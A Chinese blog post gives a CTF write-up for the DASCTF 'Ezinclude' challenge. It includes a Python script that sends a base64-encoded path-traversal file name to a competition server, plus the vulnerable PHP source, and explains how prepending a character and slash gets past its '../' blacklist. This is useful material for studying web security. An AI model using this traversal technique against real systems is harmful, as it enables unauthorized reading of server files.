DASCTF 7月赛 Ezinclude

最新推荐文章于 2024-02-25 15:43:33 发布

Arnoldqqq

最新推荐文章于 2024-02-25 15:43:33 发布

阅读量903

点赞数 1

分类专栏：安恒月赛文章标签：安全

本文链接：https://blog.csdn.net/weixin_43610673/article/details/107582230

版权

安恒月赛专栏收录该内容

6 篇文章 1 订阅

订阅专栏

在这里插入图片描述

t是时间戳 f是base64加密后的文件名

import base64
import time
import requests

now_time = str(int(time.time()))
print(now_time)  

def get_file(url, file):
    bytes_file = file.encode("utf-8")
    file = base64.b64encode(bytes_file)
    file = file.decode()
    print(file)
    payload = url + "image.php?t=" + now_time + "&f=" + file
    res = requests.get(payload)
    #print(res.text)
    if res.status_code == 200:
        html = res.content.decode('utf-8')
    print(html)
    return False


if __name__ == '__main__':
    url = "http://183.129.189.60:10009/"
    file = "t/../../../../../flag"
get_file(url, file)

在这里插入图片描述

读一下源码 t/…/…/…/…/…/var/www/html/image.php

<?php

	if(!isset($_GET['t']) || !isset($_GET['f'])){
		echo "you miss some parameters";
		exit();
	}
	
	$timestamp = time();

	if(abs($_GET['t'] - $timestamp) > 10){
		echo "what's your time?";
		exit();
	}

	$file = base64_decode($_GET['f']);
	
	if(substr($file, 0, strlen("/../")) === "/../" || substr($file, 0, strlen("../")) === "../" || substr($file, 0, strlen("./")) === "./" || substr($file, 0, strlen("/.")) === "/." || substr($file, 0, strlen("//")) === "//") {
		echo 'You are not allowed to do that.';
	}
	else{
		echo file_get_contents('/var/www/html/img/'.$file);
	}

?>

这个waf是真没想到，路径前再随便加个不在黑名单的字符+/，多个路径就饶过了，而且gqy.jpg和/gqy.jpg回显相同，因为文件名前拼接了路径file_get_contents(’/var/www/html/img/’.$file); 所以伪协议也没法用

Arnoldqqq

关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
DASCTF 7月赛 Ezinclude

t是时间戳 f是base64加密后的文件名import base64import timeimport requestsnow_time = str(int(time.time()))print(now_time) def get_file(url, file): bytes_file = file.encode("utf-8") file = base64.b64encode(bytes_file) file = file.decode() print(.
复制链接

扫一扫